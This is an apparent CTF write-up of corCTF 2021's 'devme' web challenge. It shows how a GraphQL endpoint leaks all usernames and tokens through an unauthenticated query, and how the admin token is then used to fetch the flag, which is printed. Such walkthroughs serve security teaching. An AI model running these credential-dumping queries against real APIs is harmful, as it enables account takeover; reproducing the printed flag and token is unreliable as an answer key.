devme corCTF Web challenge writeup

Hello guys back again with another tutorial this time am going to be showing you how i solved devme challenge from corCTF 2021. You are given a web page and performing manual enumeration reveals its running graphql under the hood. The graphql endpoint when passed an email address it creates a user with a sha256 hash. We later on find that we can then run three different queries

  1. Mutation query which basically allows us to add a user to the database

Without much say let’s jump in.

We have been given the following URL

https://devme.be.ax/

On opening we get a standard web page

The first enumerations that i usually run are

  1. A directory brute force using gobuster(you can use ffuf, ferobuster or even wfuzz depending on your liking)

2. A vulnerability scan using nikto

While they were running i decided to poke at the website and see what functionality it had

The web application allows a user to signup to get a free preview of a book

So i decided to signup using a fake email address and see if the form had any functionality the intercepted the request using burpsuite

Looking the screenshot of the intercepted request we see a couple of interesting information

The website has a graphql endpoint and its using mutation operations to create a user using the email address provided by the user. Mutations are GraphQL operations that can modify back-end data (unlike queries) in our case the operation is to adding a user to the backend system

The user created has a sha256 hash as the username

The next thing we could do is query the schema to see how much functionality we have. But am going to show a really awesome tool that does all the tedious work for you and show you the operation you are allowed to perform on the graphql API. The tool is called graphql-playground.

First download the appimage from GitHub and make it an executable and open it from your terminal.

Once the application has been opened. Click on the URL endpoint

Then input the graphql endpoint URL and click open

A new window will open where you can run your queries

Looking at the schema we can run 3 queries as i explained before

First i ran the user operation and queried the API for both username and tokens for each respective users

The query that i used was

query{users{username, token}}

Looking at the screenshot below i was able to dump all the usernames with their respective tokens

We are only interested on the admin’s token since it’s the one that will give us the flag

Next i ran the second query that is used to retrieve the flag. The query used was

query{flag(token:"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")}

And looking the screenshot below we are able to retrieve the flag

which is

corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}

And that’s it for the challenge. This tutorial just touched the basics of graphql I’ve seen SQL Injections, command injections etc exploited from graphql take time and read it. But till the next time, It’s goodbye. If you liked the walkthrough don’t forget to clap for me down below and follow me so that you won’t miss any upcoming walkthrouhgs

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)